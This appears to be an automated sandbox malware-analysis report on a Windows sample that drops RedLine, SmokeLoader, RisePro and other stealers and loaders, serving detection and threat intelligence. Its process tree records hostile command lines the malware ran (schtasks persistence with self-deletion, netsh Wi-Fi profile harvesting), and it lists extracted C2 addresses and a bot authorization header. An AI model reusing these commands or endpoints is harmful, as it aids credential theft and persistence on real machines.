Edit tour

Windows Analysis Report
jtfCFDmLdX.exe

Overview

General Information

Sample Name:	jtfCFDmLdX.exe
Original Sample Name:	b70f4854e1ecf7923fb88ed64198068a.exe
Analysis ID:	1344493
MD5:	b70f4854e1ecf7923fb88ed64198068a
SHA1:	6d2acf5525526087c1338497ce2862f385a51aa4
SHA256:	45715fffc3f6be7012dba68a9d483d8230573afb7896cec5dea7a2f24fb5608c
Tags:	exeRiseProStealer
Infos:

Detection

Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Yara detected RisePro Stealer

Yara detected zgRAT

Sigma detected: Capture Wi-Fi password

Yara detected SmokeLoader

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Antivirus detection for dropped file

Snort IDS alert for network traffic

Yara detected Gurcu Stealer

Found malware configuration

Multi AV Scanner detection for submitted file

Benign windows process drops PE files

Malicious sample detected (through community Yara rule)

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Yara detected PrivateLoader

Tries to steal Mail credentials (via file / registry access)

Disable Windows Defender real time protection (registry)

Maps a DLL or memory area into another process

Uses netsh to modify the Windows network and firewall settings

Found Tor onion address

PE file has a writeable .text section

Connects to many ports of the same IP (likely port scanning)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Yara detected Costura Assembly Loader

Uses known network protocols on non-standard ports

Uses the Telegram API (likely for C&C communication)

Machine Learning detection for sample

Allocates memory in foreign processes

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

.NET source code contains very large array initializations

Contains functionality to inject code into remote processes

Creates a thread in another existing process (thread injection)

Found many strings related to Crypto-Wallets (likely being stolen)

Uses schtasks.exe or at.exe to add and modify task schedules

Disable Windows Defender notifications (registry)

Checks if the current machine is a virtual machine (disk enumeration)

Tries to harvest and steal browser information (history, passwords, etc)

Writes to foreign memory regions

Tries to steal Crypto Currency Wallets

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Contains functionality to capture screen (.Net source)

Tries to harvest and steal WLAN passwords

Modifies windows update settings

Uses ping.exe to check the status of other devices and networks

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Machine Learning detection for dropped file

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

May use the Tor software to hide its network traffic

Contains functionality to query locales information (e.g. system language)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Stores files to the Windows start menu directory

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Downloads executable code via HTTP

Uses insecure TLS / SSL version for HTTPS connection

Contains long sleeps (>= 3 min)

May check the online IP address of the machine

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Found evasive API chain checking for process token information

Checks if the current process is being debugged

Binary contains a suspicious time stamp

Creates a start menu entry (Start Menu\Programs\Startup)

PE file contains more sections than normal

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to shutdown / reboot the system

Creates COM task schedule object (often to register a task for autostart)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

PE file contains executable resources (Code or Archives)

IP address seen in connection with other malware

Enables debug privileges

Queries information about the installed CPU (vendor, model number etc)

AV process strings found (often used to terminate AV products)

Found inlined nop instructions (likely shell or obfuscated code)

PE file does not import any functions

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

Detected TCP or UDP traffic on non-standard ports

Connects to several IPs in different countries

Creates a window with clipboard capturing capabilities

Enables security privileges

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Uses Microsoft's Enhanced Cryptographic Provider

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

jtfCFDmLdX.exe (PID: 6708 cmdline: C:\Users\user\Desktop\jtfCFDmLdX.exe MD5: B70F4854E1ECF7923FB88ED64198068A)

TE0FN83.exe (PID: 6796 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TE0FN83.exe MD5: 272E0DC32730BC6AC7850C8C7BA31B61)

Tg9kb35.exe (PID: 6588 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\Tg9kb35.exe MD5: 2E13B79FB62E2F3B5B2038A0298578D1)

2zx1310.exe (PID: 3140 cmdline: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe MD5: 4CA9AC47A5200585D4F6693B30CED951)

conhost.exe (PID: 6592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

AppLaunch.exe (PID: 5064 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 89D41E1CF478A3D3C2C701A27A5692B2)

4ZZ099qJ.exe (PID: 5828 cmdline: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe MD5: E7F331448A92EE19814902733D0F6E58)

conhost.exe (PID: 3340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

AppLaunch.exe (PID: 5788 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 89D41E1CF478A3D3C2C701A27A5692B2)

AppLaunch.exe (PID: 2020 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 89D41E1CF478A3D3C2C701A27A5692B2)

5zQ4dC4.exe (PID: 4904 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\5zQ4dC4.exe MD5: 0347EA57AB6936886C20088C49D651D2)

explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

rundll32.exe (PID: 5576 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: EF3179D498793BF4234F708D3BE28633)

7FE0.exe (PID: 348 cmdline: C:\Users\user\AppData\Local\Temp\7FE0.exe MD5: 9E41D2CC0DE2E45CE74E42DD3608DF3B)

8427.exe (PID: 5164 cmdline: C:\Users\user\AppData\Local\Temp\8427.exe MD5: E2CD9DED5E36DF514FCDCC80134EEBDD)

932079.exe (PID: 4336 cmdline: "C:\Users\user\AppData\Local\932079.exe" MD5: 6C209163F8881E51E553F6C1B306D645)

8F82.exe (PID: 3128 cmdline: C:\Users\user\AppData\Local\Temp\8F82.exe MD5: 52CC4016261C2CC9311F48B4D84C8D4E)

cmd.exe (PID: 6708 cmdline: C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "8F82" /sc MINUTE /tr "C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe" /rl LIMITED /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\8F82.exe" &&START "" "C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

9AED.exe (PID: 3340 cmdline: C:\Users\user\AppData\Local\Temp\9AED.exe MD5: FF4691F6C1F0E701303C2B135345890E)

conhost.exe (PID: 3264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

C4AD.exe (PID: 6928 cmdline: C:\Users\user\AppData\Local\Temp\C4AD.exe MD5: 03205A2FE1C1B6C9F6D38B9E12D7688F)

jsc.exe (PID: 2160 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe MD5: 94C8E57A80DFCA2482DEDB87B93D4FD9)

D9EC.exe (PID: 5212 cmdline: C:\Users\user\AppData\Local\Temp\D9EC.exe MD5: 2A42D97ACFD504A4E15577F165F63A40)

D9EC.exe (PID: 5268 cmdline: C:\Users\user\AppData\Local\Temp\D9EC.exe MD5: 2A42D97ACFD504A4E15577F165F63A40)

39D.exe (PID: 2920 cmdline: C:\Users\user\AppData\Local\Temp\39D.exe MD5: DCF08EB00B5C34D77A4C96DD3DA08422)

InstallSetup5.exe (PID: 6212 cmdline: "C:\Users\user\AppData\Local\Temp\InstallSetup5.exe" MD5: 7714DFF962CF31AF75ABF7F7A58166EF)

6rR8iy1.exe (PID: 5244 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\6rR8iy1.exe MD5: F4AF3A9BB5B128EA7F4A49016AE8DE1F)

conhost.exe (PID: 1744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 3288 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 1196 cmdline: ping 127.0.0.1 MD5: 2F46799D79D22AC72C241EC0322B011D)

schtasks.exe (PID: 5924 cmdline: schtasks /create /tn "8F82" /sc MINUTE /tr "C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe" /rl LIMITED /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

8F82.exe (PID: 404 cmdline: "C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe" MD5: 52CC4016261C2CC9311F48B4D84C8D4E)

tor-real.exe (PID: 3748 cmdline: C:\Users\user\AppData\Local\ixas4a6gsv\tor\tor-real.exe" -f "C:\Users\user\AppData\Local\ixas4a6gsv\tor\torrc.txt MD5: 07244A2C002FFDF1986B454429EACE0B)

conhost.exe (PID: 5244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4864 cmdline: cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ] MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 3900 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

netsh.exe (PID: 2844 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

findstr.exe (PID: 3916 cmdline: findstr /R /C:"[ ]:[ ]" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

cmd.exe (PID: 6472 cmdline: cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 5500 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

netsh.exe (PID: 1184 cmdline: netsh wlan show networks mode=bssid MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

findstr.exe (PID: 5472 cmdline: findstr "SSID BSSID Signal" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

8F82.exe (PID: 3548 cmdline: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe MD5: 52CC4016261C2CC9311F48B4D84C8D4E)

IdentityReference.exe (PID: 1456 cmdline: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe MD5: 2A42D97ACFD504A4E15577F165F63A40)

IdentityReference.exe (PID: 4556 cmdline: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe MD5: 2A42D97ACFD504A4E15577F165F63A40)

8F82.exe (PID: 3180 cmdline: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe MD5: 52CC4016261C2CC9311F48B4D84C8D4E)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
PrivateLoader	According to sekoia, PrivateLoader is a modular malware whose main capability is to download and execute one or several payloads. The loader implements anti-analysis techniques, fingerprints the compromised host and reports statistics to its C2 server.	No Attribution	https://any.run/cybersecurity-blog/privateloader-analyzing-the-encryption-and-decryption-of-a-modern-loader/ https://bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem https://de.darktrace.com/blog/privateloader-network-based-indicators-of-compromise	https://malpedia.caad.fkie.fraunhofer.de/details/win.privateloader

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/ https://bartblaze.blogspot.com/2021/06/digital-artists-targeted-in-redline.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://194.49.94.210/fks/index.php", "http://194.49.94.210/fks/index.php"]}

Threatname: RedLine

{"C2 url": "194.49.94.80:42359", "Bot Id": "FILE2", "Authorization Header": "82506a2bfe25f76a5450c48bf3a84def"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\IXP000.TMP\6rR8iy1.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\IXP000.TMP\6rR8iy1.exe	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 19 88 44 24 2B 88 44 24 2F B0 C2 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
C:\Users\user\AppData\Local\Temp\GtxAoNQLNDxAZTy.data	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\IXP001.TMP\5zQ4dC4.exe	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
C:\Users\user\AppData\Local\Temp\39D.exe	MALWARE_Win_DLInjector04	Detects downloader / injector	ditekSHen	0xc3b6f8:$s1: Runner 0xc3b85d:$s3: RunOnStartup 0xc3b70c:$a1: Antis 0xc3b739:$a2: antiVM 0xc3b740:$a3: antiSandbox 0xc3b74c:$a4: antiDebug 0xc3b756:$a5: antiEmulator 0xc3b763:$a6: enablePersistence 0xc3b775:$a7: enableFakeError 0xc3b886:$a8: DetectVirtualMachine 0xc3b8ab:$a9: DetectSandboxie 0xc3b8d6:$a10: DetectDebugger 0xc3b8e5:$a11: CheckEmulator

Memory Dumps

Source	Rule	Description	Author	Strings
0000001F.00000002.2373883044.000000C00076C000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
0000001F.00000003.2175797793.000000C0003A0000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
0000001F.00000003.2174358473.000000C000418000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
0000002C.00000002.3059749646.000001AF10492000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000001F.00000002.2379752347.000000C000E54000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
0000002C.00000002.2357995351.000001AF00212000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000002A.00000002.2317887669.000001E96A7A0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000A.00000002.1747098618.0000000000160000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000A.00000002.1747098618.0000000000160000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x5e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000002B.00000002.2426218610.0000027D9CC00000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0000002B.00000002.2426218610.0000027D9CC00000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x9d2f2:$s1: file:/// 0x9d202:$s2: {11111-22222-10009-11112} 0x9d282:$s3: {11111-22222-50001-00000} 0x963e8:$s4: get_Module 0x96851:$s5: Reverse 0x9c368:$s6: BlockCopy 0x9ccde:$s7: ReadByte 0x9d304:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
0000002C.00000002.2357995351.000001AF00001000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000002C.00000002.2357995351.000001AF0021A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000001F.00000003.2176077737.000000C00035E000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000001F.00000003.2174358473.000000C00042E000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
0000001F.00000003.2176077737.000000C0002C0000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000018.00000002.2633753789.0000000002531000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000001F.00000003.2171483498.000000C0004F8000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
0000002A.00000002.2208933184.000001E951CD4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000001F.00000002.2371460377.000000C000566000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000002C.00000002.2357995351.000001AF001FE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000002B.00000002.2261083821.0000027D84460000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000003.1650336900.0000000004F58000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmp	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
0000001F.00000003.2175797793.000000C0003B8000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
0000001F.00000003.2173330685.000000C0004BA000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
0000002B.00000002.2368041511.0000027D949BD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000002C.00000002.3059749646.000001AF1065E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000A.00000002.1747475725.00000000005E1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000A.00000002.1747475725.00000000005E1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x1e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000018.00000002.2630979082.0000000000572000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000001F.00000003.2144147018.000000C000772000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
0000002C.00000002.2357995351.000001AF001FA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000001F.00000002.2371460377.000000C000530000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000030.00000002.2743323065.0000000002911000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000001F.00000003.2171483498.000000C00076C000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
0000002B.00000002.2264896125.0000027D84541000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000001F.00000003.2243089557.000001FEC5590000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000009.00000002.2013665902.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
0000001F.00000003.2312747036.000001FEC5542000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000005.00000002.1825048903.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000001F.00000002.2368648905.000000C0003A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000030.00000002.2743323065.00000000029AB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000030.00000002.2743323065.00000000029AB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000018.00000002.2630661047.0000000000416000.00000004.00000001.01000000.00000012.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000001F.00000002.2368648905.000000C000368000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000001F.00000002.2371460377.000000C0004F8000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000002B.00000002.2368041511.0000027D94C20000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
Process Memory Space: AppLaunch.exe PID: 5064	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: AppLaunch.exe PID: 5064	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: AppLaunch.exe PID: 2020	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
Process Memory Space: 7FE0.exe PID: 348	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 7FE0.exe PID: 348	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: 8F82.exe PID: 3128	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
Process Memory Space: 9AED.exe PID: 3340	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 9AED.exe PID: 3340	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: 8F82.exe PID: 3548	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
Click to see the 61 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
